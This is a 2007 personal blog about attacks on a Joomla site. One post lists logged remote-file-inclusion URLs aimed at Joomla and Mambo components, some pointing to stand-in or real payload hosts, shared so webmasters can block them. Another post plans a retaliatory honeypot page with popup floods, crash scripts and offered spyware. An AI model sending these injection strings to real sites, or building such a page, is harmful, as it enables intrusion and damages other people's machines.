|
|
front page
|
Tuesday, 12 June 2007 |
As everyone who has ever read my blog probably knows by know, I have noticed a large increase in the number of hack attempts upon my Joomla based site. I currently have a little fun with these hackers, and have decided to make my noindex page a bit of a honeypot experiment. In the recent zipfile I posted of strings these hackers use, as well as their scripts, I copied the strings and pasted them in the bottom of my noindex.html page. Then, I stuffed the page with Google ads (may as well try to make a buck off of them, huh?), and ran it through the QUIT indexing tool. Hopefully, my site's hack attempts will all be constrained to only my noindex.html page, rather than my actual site from now on.
Some friends of mine, as well as myself have been discussing measures to further mess with these would-be hackers. Don't get me wrong, I consider myself a hacker, but more of a white/greyhat, and not a cracker or defacer. We are eventually going to build a noindex page to rule them all, one that will do lots of fun things to the attacker's browser/script, hopefully shutting or slowing him/her down. Some ideas we have had include the following:
- Millions of popup windows, going to user chosen locations, like ads, affiliate sites, Goatse, etc...
- Refresh every x seconds, popping up all of the windows again
- Create a memory leak somehow
- Have the hacker's machine attempt to calculate Pi through their browser
- Use portions of other crash scripts from around the web
- Offer to install weather spyware, bonzi buddy, etc...
- The list goes on
The only problem is that I stink at PHP, as well as Java. I can do templates, but that is about the full extent of my web language abilities. Anybody have any ideas, or code you would like to contribute? If so, just leave a comment and we can get in touch. Otherwise, go to I-Hacked and submit a worthwhile article to get a free membership. Then, you can discuss the project in there with us.
|
|
|
Monday, 11 June 2007 |
I updated the Sharp Fonts in KDE article today with information on improving fonts within some GTK applications. Here it is, in case you don't want to scroll to the bottom of that article:
Some GTK Apps
For some GTK apps, it is possible to make the fonts look nice. For example, without the next tweak, Automatix's fonts would look like garbage. Open a terminal and type "sudo vim ~/.gtkrc.mine" then hit the "I" key. Copy and paste the below text into the terminal:
style "user-font"
{
fontset="-microsoft-tahoma-medium-r-normal-*-10-&#-*-p-&#"
}
widget_class "*" style "user-font"
Then, hit the "Esc" key, and type :wq (colon "w" "q"), and hit enter. All done!
|
|
|
Sunday, 10 June 2007 |
I have had lots of code injection attempts as of late, and none have been successful. What the people behind these attacks are doing fit into two categories:
1. They are hacking sites just to display a "hacked by" page, to get more cred among the hacker community
2. They are using these injection scripts to run shell scripts to control the server which is then used for DoS, as well as other nefarious activities.
How do "they" find potentially vulnerable sites? They use a list of strings to search for in Google, and I happen to have it. Get it here, and block all of these URLs (or those that apply to your CMS) in your .htaccess file, or by some other means.
I have gone through my server logs, and posted my Joomla URLs that people attempt to inject code into, with the hope that people will block them in .htaccess to prevent security issues. Also, I highly suggest you make sure the PHP fopen() function is disabled in your php.ini, to prevent remote files from being opened by your server.
Alongside these URLs, I have grabbed copies of all of the scripts these hackers are using, most of which are hosted on hacked sites. In the downloads area, you will find a zipped pack of these scripts, which also has places they are hosted. I hope that someone more skilled in security and PHP can use these for the benefit of webmasters like myself.
One More Example
|
|
|
Thursday, 07 June 2007 |
|
You go to a McDonalds 15min from your house to use the WiFi because you live in the middle of nowhere with only dialup, arriving at 9PM, and leaving past 2AM. Seriously, though, I shouldn't have done this. I really need to branch out and do more than computer crap. I was trying to compile PHP5 with fastcgi so that I could install APC cache to improve my site's performance. As it turns out, this crap is hard to compile, and I am going to give up and perhaps outsource it sometime, unless anyone out there wants to give free help in the comments below... (Installing PHP5 on Dreamhost shared hosting...I don't suggest it if you can avoid it...sheesh!)
|
|
|
Wednesday, 06 June 2007 |
Updated 6/10/2007
MAJOR UPDATE! - This is a file used to find "vulnerable" site using Google. Coincidentally, it contains strings that you should block in your .htaccess file.
It seems that many hackers (mostly Turkish, according to my server logs) have been attempting to break into Joomla and Mambo based sites. They usually attack just by requesting a URL that at the same time would be able to change your CMS settings if you aren't up to date, and hardened. Some of these URLs include the following:
/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.theirsite.com/code.txt
//administrator/components/com_mamboboard/file_upload.php=http://www.evilcode.com
/projects/libraries/pcl/pcltar.php
/site-announcements//administrator/components/com_uhp/uhp_config.php
/administrator/components/com_babackup/classes/Tar.php
//administrator/components/com_mamboboard/file_upload.php=http://theirevilurl.com
//administrator/components/com_remository/admin.remository.php http://www.evilcode.com/
/administrator/components/com_a6mambocredits/admin.a6mambocredits.php
/administrator/components/com_comprofiler/plugin.class.php
/administrator/components/com_cropimage/admin.cropcanvas.php
/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php
/administrator/components/com_mgm/help.mgm.php
/administrator/components/com_remository/admin.remository.php
/administrator/components/com_serverstat/install.serverstat.php
/administrator/components/com_uhp/uhp_config.php
/administrator/components/com_webring/admin.webring.docs.php
/components/com_artlinks/artlinks.dispnew.php
/components/com_cpg/cpg.php
/components/com_galleria/galleria.html.php
/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php
/components/com_performs/performs.php
/components/com_phpshop/toolbar.phpshop.html.php
/components/com_rsgallery/rsgallery.html.php
/components/com_smf/smf.php
/components/com_zoom/includes/database.php
//function.is-dir
/function.is-dir
//administrator/components/com_remository/admin.remository.php
/function.require
/function.require-once
/components/com_zoom/classes/iptc/EXIF_Makernote.php
//components/com_joomlaboard/file_upload.php
/administrator/:/www.mattparnell.com/index.php
/projects//components/com_joomlaboard/file_upload.php
/projects/top-10-must-have-joomla-addons.html//components/com_joomlaboard/file_upload.php
/projects//components/com_joomlaboard/file_upload.php
///administrator/components/com_mgm/help.mgm.php
//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php
//administrator/components/com_uhp/uhp_config.php
//classes/adodbt/sql.php
//components/com_cpg/cpg.php
//components/com_mtree/Savant2/Savant2_Plugin_textarea.php
//components/com_phpshop/toolbar.phpshop.html.php
//components/com_rsgallery/rsgallery.html.php
/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php
/components/com_performs/performs.php
/dministrator/components/com_remository/admin.remository.php
/shady-stuff/interesting-open-directories.htmljavascript:ac_smilie(
New as of June 9:
/'<a
/allinurl:%22.php
//administrator/components/com_serverstat/install.serverstat.php
//components/com_remository/admin.remository.php
//components/com_zoom/classes/iptc/EXI_Makernote.php
//performs.php
/administrator/index2.pp
/components/com_videodb/core/videodb.class.xml.php
/components/com_zoom/classes/iptc/EXIF.php
/com_mtreehttp://efardella.cinet.it/claroline/phpbb/id.txt
/com_uhphttp://jargo.phpnet.us/ilkom.txt
/site-announcements//components/com_remository/admin.remository.php
/site-announcements/components/com_rsgallery/rsgallery.html.php
Note that the one in bold is the one that I see attempted the most. I suggest you upgrade to the latest stable version of Mambo or Joomla, and implement .htaccess blocks to redirect people going to these addresses to a noindex.html page (don't click, mine loops in infiinite redirects to itself...I need to get it to make a popup of itself onload at some point too, to make life even harder for the would-be hacker)...
|
|
| | << Start < Prev 11 12 13 14 15 16 17 18 19 20 Next > End >>
| | Results 91 - 99 of 229 |
|
